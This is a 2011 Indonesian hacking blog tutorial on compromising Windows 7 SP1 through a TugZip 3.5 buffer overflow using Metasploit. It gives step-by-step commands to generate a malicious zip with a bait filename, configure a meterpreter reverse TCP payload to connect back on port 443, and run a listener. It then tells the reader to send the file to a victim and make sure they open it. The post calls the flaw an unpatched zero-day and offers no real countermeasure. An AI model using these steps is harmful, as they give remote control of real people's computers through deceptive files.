,
Headlines News :
Home » » Hacking Windows 7 SP1 via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday) ( by heykhend )

Hacking Windows 7 SP1 via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday) ( by heykhend )

Written By Nanda Journey on Minggu, 20 November 2011 | 15.09

 
Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R1

Victim O.S : Windows 7 SP1

Tested Vulnerable Application : TugZip 3.5

Exploit Credit : Stefan Marin, Lincoln, TecR0c, mr_me

This tutorial I wrote after surfing around metasploit and then found this exploit :-) .
According to metasploit.com about this exploit :
This module exploits a stack-based buffer overflow vulnerability in the latest version 3.5 of TugZip archiving utility. In order to trigger the vulnerability, an attacker must convince someone to load a specially crafted zip file with TugZip by double click or file open. By doing so, an attacker can execute arbitrary code as the victim user.
Don't wait too long, let's try this in your personal lab by using virtual machine.

Requirements :

1. TugZip 3.5
Download from Mediafire.com

2. TugZip Exploit (press CTRL + click my affiliations box to view the download link below)
3. Metasploit Framework

Step By Step :

Attacker IP Address : 192.168.8.93

Victim IP Address : 192.168.8.91

1. Download TugZip from the mediafire link above and install it in victim computer(testing purposes)
2. Open Metasploit console by running msfconsole command and then update it first using msfupdate command to update the library. If you didn't have internet connection to update the library, you can download the exploit above and then put it in /pentest/exploits/framework/modules/exploit/windows/fileformat/
Use the exploit and then set up the payload(see picture below)
Hacking Windows 7 Ultimate via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday)
3. The next step you need to configure the needed switch in this exploit to match your needs. To view all available switch just run show options command.
Hacking Windows 7 Ultimate via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday)
Info :

set filename h0T-clipS.zip --> set up your desired filename for the malicious file

set lhost 192.168.8.93 --> set up the local address to connect back to payload when exploit successfully triggered

set lport 443 --> our local port to receive connection from victim

exploit --> generate the malicious file with payload

/root/.msf4/data/exploits/h0T-clipS.zip --> the malicious file stored in this location
4. The next step we need to set up a listener to handle reverse connection from our exploit(if it's successfully triggered)
Hacking Windows 7 Ultimate via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday)
Info :

use exploit/multi/handler --> set up handler to handle connection to our machine

set payload/windows/meterpreter/reverse_tcp --> make this same with the payload we've already been set up above

set lhost 192.168.8.93 --> make this same with the ip we've already been set up above

set lport 443 --> make this same with the local port we've already been set up above

exploit --> start listen for incoming connection
5. After everything has been set up, we need to send the malicious file in step 3 to victim and make sure victim opened that file. After victim opened our malicious file, our metasploit console will have an active session of victim system.
Hacking Windows 7 Ultimate via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday)
Pwn3D!!

Countermeasures :

1. Until I'm wrote this tutorial(2011-10-15) the status still zeroday a.k.a no cure.
Hope it's useful :-)
by admin : heykhend
Anda sedang membaca artikel tentang Hacking Windows 7 SP1 via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday) ( by heykhend ) dan anda bisa menemukan artikel Hacking Windows 7 SP1 via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday) ( by heykhend ) ini dengan url http://hy-hack.blogspot.com/2011/11/hacking-windows-7-sp1-via-tugzip-35.html,Dilarang menduplikat artikel ini Hacking Windows 7 SP1 via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday) ( by heykhend ) jika sangat bermanfaat hanya boleh sebagai artikel refrensi atau harus mengulas nya dengan bahasa / kalimat yang berbeda dan memberi link ini : Hacking Windows 7 SP1 via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday) ( by heykhend )


Artikel Terkait:

Share this post :

Poskan Komentar

Blog Dofolow , Tapi Tolong jangan nyepam dan ada kata kata yang tidak baik

 
Support : Abaut Us | Contact Us | Privacy Policy | Term of Use | Redaksi | Advertise | Lowongan Kerja | Forum | Tabloit | Mobile Version | Hy Hack Toolbar
Copyright © 2011. HY hack - All Rights Reserved Template Created by Heykhend
Published by Heykhend Corp. Developed by PT Heykhend Publik Media (HPM)